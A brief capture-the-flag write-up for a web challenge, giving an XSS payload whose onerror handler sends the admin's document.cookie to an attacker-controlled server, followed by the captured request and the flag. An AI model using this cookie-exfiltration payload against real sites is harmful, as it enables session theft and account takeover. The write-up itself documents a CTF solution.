Anti Xmas Warriors

You remember when I said I dropped clam's tables? Well that was on Xmas day. And because I ruined his Xmas, he created the Anti Xmas Warriors to try to ruin everybody's Xmas. Despite his best efforts, Xmas Still Stands. But, he did manage to get a flag and put it on his site. Can you get it?

• URL: https://xmas.2020.chall.actf.co/

Solution

XSS;

<img src="" onerror="document.write('<img src=\'http:\/\/our_server/bla?cookie='+document.cookie+'\'/>')"/>

GET /bla?cookie=super_secret_admin_cookie=hello_yes_i_am_admin;%20admin_name=Juan HTTP/1.1.
Host: our_server
Connection: keep-alive.

Flag

actf{hello_yes_i_am_admin}